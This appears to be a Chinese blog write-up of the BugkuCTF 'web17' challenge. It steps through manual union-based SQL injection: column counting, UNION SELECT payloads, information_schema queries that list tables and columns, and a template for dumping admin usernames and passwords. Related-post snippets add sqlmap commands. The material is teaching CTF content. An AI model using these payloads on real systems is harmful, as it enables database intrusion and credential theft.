BugkuCTF web17_成绩单 writeup

最新推荐文章于 2021-05-30 10:26:47 发布
最新推荐文章于 2021-05-30 10:26:47 发布
阅读量978 收藏 5
点赞数 8
分类专栏: CTF 文章标签: unctf sql 数据库
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Mitchell_Donovan/article/details/112446855
版权

web17_成绩单

原题链接

key:SQL手动注入

 

①点开环境后页面长这样式的👇

根据提示随便输入1或2或3,分别出来了三个人的成绩

看到了表单类型,可知这是一道SQL注入题

 

②先测试正常数据,用火狐的hackbar插件进行post请求,一切正常👇

加上单引号'则数据为空👇

但是再加上#就又正常了👇

由此可知有SQL注入漏洞

加上单引号可以判断是否是单引号闭合

如果在结尾再加上一个单引号,就构成了双引号闭合,截断了原有的代码

闭合后剩余内容会作为sql语句来执行

添加#是将原有的被截断的代码注释掉

在sql中注释符是#或者-- ,后者在GET传参中表示为--+

 

③然后尝试获取列数,因为已经有名字和三科成绩了,所以就测试4或者更高

先从4开始吧,构造id=1' order by 4#,正常回显

继续,但构造id=1' order by 5#时,没有正常回显

所以列数是4列

 

④尝试联合查询,记得把前面的查询数据置空,即id等于除了1,2,3以外的任何数

具体做法是id=0' union select 1,2,3,4#

显示正常,说明确确实实存在这四列数据

 

⑤下面我们开始猜解数据库名, 数据库的用户,数据库的版本

没有顺序可言,把第1列留出来只是因为表单看起来顺眼而已

具体做法是id=0' union select 4545945,database(),user(),version()#

 

⑥根据数据库skctf_flag去查询表名

具体做法是id=0' union select 4545945,(select group_concat(table_name) from information_schema.tables where table_schema=database()),user(),version()#

这个select group_concat(table_name) from information_schema.tables where table_schema=database(),可以暂且把它当作一个用来查询表名的固定格式

知识补充:union select 手工注入

mysql中的information_schema 结构用来存储数据库系统信息 

information_schema 结构中这几个表存储的信息,在注射中可以用到的几个表  

 

SCHEMATA 存储数据库名的, 

关键字段:SCHEMA_NAME,表示数据库名称 

TABLES 存储表名的 

关键字段:TABLE_SCHEMA表示表所属的数据库名称; 

TABLE_NAME表示表的名称 

COLUMNS 存储字段名的 

关键字段:TABLE_SCHEMA表示表所属的数据库名称; 

TABLE_NAME表示所属的表的名称 

COLUMN_NAME表示字段名 

 

爆所有数据名 

select group_concat(SCHEMA_NAME) from information_schema.schemata 

得到当前库的所有表 

select group_concat(table_name) from information_schema.tables where table_schema=database() 

得到表中的字段名(列名) 将敏感的表进行16进制编码adminuser=0x61646D696E75736572

select group_concat(column_name) from information_schema.columns where table_name=0x61646D696E75736572 

得到字段(列)具体的值     select group_concat(username,0x3a,password) from adminuser

group_concat()函数是将数据作为字符串输出,中间以:间隔开(因为0x3a是:的16进制ascii码)

 

⑦上一步得到了表名fl4g和sc,flag应该藏在fl4g里面

根据fl4g表去查询字段名(列名)

根据知识补充里的指令,我们应该用select group_concat(column_name) from information_schema.columns where table_name=0x666c3467

觉得16进制麻烦也可以用单引号select group_concat(column_name) from information_schema.columns where table_name='fl4g'

因此构造id=0' union select 4545945,(select group_concat(column_name) from information_schema.columns where table_name='fl4g'),user(),version()#

得到字段名(列名)skctf_flag

 

⑧尝试获取字段(列)中的数据

根据知识补充里的指令,我们应该用select group_concat(skctf_flag) from fl4g

或者可以用更简便的表达select skctf_flag from fl4g

因此构造id=0' union select 4545945,(select group_concat(skctf_flag) from fl4g),user(),version()#

或者id=0' union select 4545945,(select skctf_flag from fl4g),user(),version()#

得到flag是BUGKU{Sql_INJECT0N_4813drd8hz4}

 

 

 

参考网址,因为是第一次做SQL注入的题,很多知识需要参考学习,感谢这位大佬的指导!

 

Mitch311
关注
专栏目录
BugKu CTF(杂项篇MISC)—split_all
飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘
12-24 2148
BugKu CTF(杂项篇MISC)—split_all 文章目录BugKu CTF(解密篇Crypto)—split_allfile 010 打开常用文件头把前面png文件头删去,补全gif文件头,另存为gif文件stegsolve打开python 拼接flag file 010 打开 常用文件头 JPEG (jpg),文件头:FFD8FF PNG (png),文件头:89504E47 GIF (gif),文件头:47494638 ZIP Archive (zip),文件头:504B
bugkuctf web基础部分 writeup
river
03-20 2922
Bugku-ctf-web 管理员系统 随便输入用户名和密码提示 窗体顶端 窗体底端 IP禁止访问,请联系本地管理员登陆,IP已被记录. 明显需要伪造允许登录的IP 知识点: XFF头(X-Forwarded-For),代表客户端,也就是HTTP的请求端真实的IP。有两种方式可以从HTTP请求中获得请求者的IP地址。一个是从Remote Address中获得,另一个是从X-Forward-For中...
BugkuCTF-web-成绩单 writeup
kuller_Yan的博客
03-26 439
记一次简单的SQL注入 题目传送门,点击即走 首先分析题目:进入题目网页就可以看到这个 遇到表单,当然要填一填,看看有什么变化。于是我根据题目提示输入1。仔细观察可以发现输入1,并且返回后,出现了龙龙龙的成绩单以及四份数据。 于是打开hackbar,post提交 正常返回,加 ’ 测试一下 啥也不是,再加个 # 又正常了。 那么基本可以认定是SQL注入无疑了。 两种解题方法: 1:手...
Bugku web17 学生成绩查询
weixin_44522540的博客
02-23 257
十九、web17 学生成绩查询 id=1时,可以查询到成绩 id=1’ 为空 id=1’ and 1=1 # 与 id=1’ and 1=2 # 结果不同,由此判读可能存在sql注入 1、尝试获取列数 id=1’ order by 4 #,正常回显, id=1’ order by 5 #,异常,由此判断有4列 2、union联合查询 id=-1’ union select 1,2,3,4#,正常显示,说明存在这四列数据 3、爆库名、用户和版本 id=-1’ union select 1234,da
Bugku CTF-web17 成绩单
weixin_44023403的博客
05-15 360
Bugku CTF-web17成绩单前言一、pandas是什么?二、使用步骤1.引入库2.读入数据总结 前言 提示:这里可以添加本文要记录的大概内容: 例如:随着人工智能的不断发展,机器学习这门技术也越来越重要,很多人都开启了学习机器学习,本文就介绍了机器学习的基础内容。 提示:以下是本篇文章正文内容,下面案例可供参考 一、pandas是什么? 示例:pandas 是基于NumPy 的一种工具,该工具是为了解决数据分析任务而创建的。 二、使用步骤 1.引入库 代码如下(示例): import numpy
Bugku CTF web17Web
ChaoYue_miku的博客
02-28 557
0、打开网页,根据提示判断为SQL联合注入 要求查询列数相同,其中有Name、Math、 English、Chinese 一共四个数据,因此需要select 1,2,3,4 1、构造语句:id=0' union select 1,2,3,4# 有回显,进一步查询数据库 2、查询数据库:id=0' union select 1,2,3,database()# 得到数据库名:skctf 3、查询数据表:id=0' union select 1,2,3,table_name fro..
bugku web17
PRCORANGE的博客
04-10 151
题目 首先测试正常数据。 尝试在正常数据后加上单引号,发现数据为空 传入1’’#可以正常输出 尝试获取列数,得知是4列 尝试直接联合查询 获取数据库名 根据数据库去查表名 找列名 获取数据 找到flag ...
BugkuCTF——最新webwriteup(持续更新)
1匹黑马
11-16 3822
文章目录web2计算器web基础$_GETweb基础$_POST矛盾web3域名解析你必须让他停下变量1 web2 打开页面后F12查看源代码即可。 flag:KEY{Web-2-bugKssNNikls9100} 计算器 这里做了输入长度限制,F12选中输入框,修改长度限制即可。 flag:flag{CTF-bugku-0032} web基础$_GET 这里要理解超全局变量$_GET,只要我们传递的参数为what,并且内容为flag,即可输出flag。 flag:flag{bugku_get_su8
CTF_Competitions_Writeup:周大福比赛作品集
04-13
CTF_Competitions_Writeup 这是我解决的一些CTF竞赛挑战文章的集合。
Bugkuweb 成绩单
qq_26961571的博客
06-23 305
从这里开始进入SQL注入的普通模式啦!!撒花~~ ​ 虽然真的学过数据库,可是需要有很熟悉的PHP和数据库变量名字的理解,大概才能很好的学习这个部分。 首先打开这个题目, 快来查查成绩吧! 这里还是有一些提示的,框框里面要求输入1,2,3这种数字以便查询。但是...我们怎么能用普通的思维呢???!! 那么先什么都不输入看看。 什么都木有啊! 还是输个1看看。 接下来输了2和3也是有数据的,4就没有数据了,感觉这个数据库表...
bugku题的web类解析
01-29
这个是我自习写的bugkuweb的解析,其中四个题因为各种原因没有做出来,分别为welcome to bugku,孙xx的博客,login2,login4。也许有写的不好的地方,见谅,
CTF-Web17(涉及手工,脚本,工具注入)
→_→
09-17 388
17.简单的sql注入之3 分析: 手工注入: 首先先作判断: 正常情况下输入?id=1,页面正常输出hello,?id=0页面不输出 输入?id=’页面直接报SQL语法错误 输入?id=1 and 1=2页面正常 ?id=1' and '1'='2 页面无输出可以看出,这个是字符型SQL注入,未过滤引号和and,条件正确的情况下输出hello,错误无输出,比起SQL盲注,好 像又多了语法报错 猜解表 ?id=1' and (select count(*) from 表名)>0 .
成绩单bugku--web
小白的劝退之路
04-29 434
解法一:手工注入 输入1,2,3分别能查到1,2,3号学生的成绩 SQL注入应该没跑了 输入1’返回异常,输入1’–+返回异常,输入1’ #或者1’-- +返回正常,看来过滤了–+ 观察,表貌似有四列(名字,Math,English,Chinese),输入1’ order by 4#返回正常,输入1’ order by 5#返回异常,看来的确是4列 接下来就开始暴库名、表名、字段名 尝试联合查询,...
BugKu-web篇-web17
jiuyongpinyin的博客
05-30 162
web17 这道题是典型的sql注入,直接sqlmap一把梭就可以了,首先通过题目能够确定是post传参 并且参数的id,那么就直接sqlmap,payload如下 sudo sqlmap -u "http://114.67.246.176:10297/index.php" --data "id=1" --current-db --batch //查询当前数据库 sudo sqlmap -u "http://114.67.246.176:10297/index.php" --data "id=1" -D
BUGKU--web--成绩单解析
爱吃小敏饭团子的博客
08-24 212
BUGKU 没有任何过滤 非常友好 题目地址 :http://123.206.87.240:8002/chengjidan/ 按照题目提示输入123分别的到不同的人的成绩单 4以后出现空白,由此可以推测有4列 基本到这里就是典型的sql注入题了 打开BP firefox浏览器调节代理 BP抓包发现是POST传值 关闭代理,关闭BP 上sqlmap注入 python sqlmap.py -u "http://123.206.87.240:8002/chengjidan/index.php" --f
Bugku CTF Web(17-20) Writeup
KRDecad3的博客
06-03 1008
Bugku CTF Web(17-) Writeup 0x17flag在index里 打开页面有一个链接,点击链接发现URL改变, 则可能会有文件包含漏洞。 利用php://filter伪协议,php://filter简单理解为用在对文件的读写操作上。 payload: ?file=php://filter/read=convert.base64-encode/resour...
bugku 17~ 20write up(web)
giun的博客
03-14 424
一、第17题(输入密码查看flag)。 暴力破解,可得密码,然后输入密码可得flag 二、 第18题(点击一百万次) 查看源码可以发现,url以post的方式提交点击的次数,那么使用hacker的post功能,直接修改clicks=1000000,即可得出flag 三、第19题(备份是个好习惯) **小知识:*备份文件的扩展名一般为.swp,.bak 打开题目是一串字母,应该是MD5加密我们...
bugku web15/web17
天衷网络科技有限公司
04-08 254
web15/web17 1.web15 这个没什么好说的,直接生成字典,方bp里面跑,密码在1开头的六位数里,不用跑太多,出题人仁慈 2.web17 拿到题目网址直接在火狐打开,看到成绩查询第一反应就是sql注入,先随便输入点什么看看 输入1,直接出现成绩单,get传参没有反应,直接点击load URL,发现是post注入,这里可以使用手工注入和sqlmap直接跑出来,我为了省事直接sqlmap跑了 找到注入点,然后使用bp抓包,抓包要求是从注入点,点击命令执行后抓的包,将抓到的包复制成txt文件,放到
bugkuweb题-ctf入门(10-17
memery_key的博客
05-23 703
10、变量** http://120.24.86.145:8004/index1.php flag In the variable ! <?php error_reporting(0); // 关闭php错误显示 include "flag1.php"; // 引入flag1.php文件代码 highlight_file(__file__);
php upload ctf,强网杯CTF防御赛ez_upload Writeup
最新发布
05-14
首先,我们需要分析题目所提供的代码: ... error_reporting(0); if ($_FILES["upload"]["error"] > 0) { echo "Error: " . $_FILES["upload"]["error"] .... echo "Upload: " .... echo "Type: " .... echo "Size: " ....
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

Mitch311

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值